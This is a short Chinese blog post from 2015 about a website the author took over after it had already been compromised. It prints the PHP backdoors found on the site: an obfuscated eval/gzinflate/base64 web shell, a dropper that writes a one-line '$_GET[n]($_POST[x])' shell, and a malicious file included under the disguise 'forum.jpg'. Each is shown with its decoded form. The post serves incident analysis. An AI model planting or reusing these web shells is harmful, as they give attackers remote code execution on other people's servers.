网站被入侵,并挂马

分类:安全,工作记 | 作者:凹凸曼 | 发表于2015/07/17 网站被入侵,并挂马已关闭评论

安全问题,大多数时候我们并不会太注意,只有等到出现问题,才会去补救,这也是目前大多数公司领导所忽略的问题!

刚刚接手,已早被人拿下来webshell权限来,还木有摸热就把站点删除了,挺悲剧的。。。

入侵点之一:

Screenshot-8

后门程序一:eval(gzinflate(str_rot13(base64_decode(‘s7ezsQ/wCODlKkEtLs7Mz4svLlYsKtHQtOblylnTyCwuQS3RQ4kP8A8OiUlCzkJWSI/V1Kzm5UWJD2kNDvb094tJL8lVaAZYKNgqlBRy5qIrB5pHi28YpkGwkalyiTkaVonFqXMm8SmpIM041E8MtAc6HAA=’))));

反解:

?><?PHP
session_start();
if(isset($_POST['code'])){
$_SESSION['theCode'] = trim($_POST['code']);
}
if(isset($_SESSION['theCode'])){
eval(base64_decode($_SESSION['theCode']));
}
?><?

后门程序二:@file_put_contents(‘0.php’,base64_decode(‘PD9waHAgQCRfR0VUW25dKCRfUE9TVFt4XSk7Pz4g’));

反解:@file_put_contents(‘0.php’,”<?php @$_GET[n]($_POST[x]);?>“);

 

恶意程序:@INCLUDE_ONCE(PACK(‘H*’,’666f72756d2e6a7067′));

反解:@INCLUDE_ONCE(PACK(‘H*’,’forum.jpg’));

forum.jpg是php程序,执行一些恶意的内容

 

本文出自 “凹凸曼” 博客,请务必保留此出处 http://www.apoyl.com/?p=1931

Tag:

日志信息 »

该日志于2015-07-17 17:00由 凹凸曼 发表在安全, 工作记分类下, 评论已关闭。

目前盖楼

抱歉,评论被关闭

« »